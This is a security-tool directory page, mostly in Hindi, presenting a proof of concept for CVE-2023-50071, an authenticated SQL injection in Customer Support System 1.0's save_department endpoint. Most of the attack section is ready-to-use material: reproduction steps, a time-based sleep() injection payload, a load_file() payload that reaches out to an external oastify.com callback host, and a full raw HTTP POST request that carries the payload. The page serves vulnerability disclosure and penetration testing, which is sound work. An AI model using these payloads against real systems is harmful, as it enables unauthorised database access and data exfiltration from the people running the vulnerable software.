Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2023-50071 — /customer_support/ajax.php?action=save_department में एकाधिक SQL इंजेक्शन कमजोरियाँ Customer Support System 1.0 में प्रमाणित हमलावरों को id या name के माध्यम से मनमाना SQL कमांड निष्पादित करने की अनुमति देती हैं। | Kitploit
उपकरण/GitHubGitHub/geraldoalcantara/cve-2023-50071
भेद्यता विश्लेषणकोड विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगडेटाबेस सुरक्षा
GitHubgeraldoalcantara/cve-2023-50071

CVE-2023-50071

/customer_support/ajax.php?action=save_department में एकाधिक SQL इंजेक्शन कमजोरियाँ Customer Support System 1.0 में प्रमाणित हमलावरों को id या name के माध्यम से मनमाना SQL कमांड निष्पादित करने की अनुमति देती हैं।

रिपॉजिटरी देखें
322 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2023-50071

कस्टमर सपोर्ट सिस्टम 1.0 - एकाधिक SQL इंजेक्शन कमजोरियाँ - save_department

विवरण: /customer_support/ajax.php?action=save_department में कस्टमर सपोर्ट सिस्टम 1.0 में एकाधिक SQL इंजेक्शन कमजोरियाँ प्रमाणित हमलावरों को id या name के माध्यम से मनमाने SQL कमांड निष्पादित करने की अनुमति देती हैं।

कमजोर उत्पाद संस्करण: कस्टमर सपोर्ट सिस्टम 1.0
CVE लेखक: गेराल्डो अल्कांतारा
दिनांक: 29/11/2023
CVE: CVE-2023-50071
CVE लिंक: https://www.cve.org/CVERecord?id=CVE-2023-50071
NVD लिंक: https://nvd.nist.gov/vuln/detail/CVE-2023-50071
Tenable लिंक: https://www.tenable.com/cve/CVE-2023-50071
पुष्टि की तिथि: 15/12/2023
परीक्षण किया गया: विंडोज

पुनरुत्पादन के चरण:

1- एप्लिकेशन में लॉग इन करें। 2- पृष्ठ /customer_support/index.php?page=department_list पर जाएं। 3- कोई विभाग बनाएं या संपादित करें और निम्नलिखित पैरामीटरों में से किसी एक में दुर्भावनापूर्ण पेलोड डालें: id या name। पेलोड: id: (select load_file('\\c7kwr16trd54p693ve9xjbaao1usii67.oastify.com\test')) name: '+(select*from(select(sleep(20)))a)+'

root@kitploit:~
POST /customer_support/ajax.php?action=save_department HTTP/1.1
Host: 192.168.68.148
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Accept: */*
Accept-Language: pt-BR,pt;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate, br
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------279004446431847057031125356738
Content-Length: 444
Origin: http://192.168.68.148
Connection: close
Referer: http://192.168.68.148/customer_support/index.php?page=department_list
Cookie: csrftoken=1hWW6JE5vLFhJv2y8LwgL3WNPbPJ3J2WAX9F2U0Fd5H5t6DSztkJWD4nWFrbF8ko; sessionid=xrn1sshbol1vipddxsijmgkdp2q4qdgq; PHPSESSID=mfd30tu0h0s43s7kdjb74fcu0l

-----------------------------279004446431847057031125356738
Content-Disposition: form-data; name="id"


-----------------------------279004446431847057031125356738
Content-Disposition: form-data; name="name"

test'+(select*from(select(sleep(20)))a)+'
-----------------------------279004446431847057031125356738
Content-Disposition: form-data; name="description"

Teste
-----------------------------279004446431847057031125356738--

खोजकर्ता/क्रेडिट: गेराल्डो अल्कांतारा

टूल डाउनलोड करें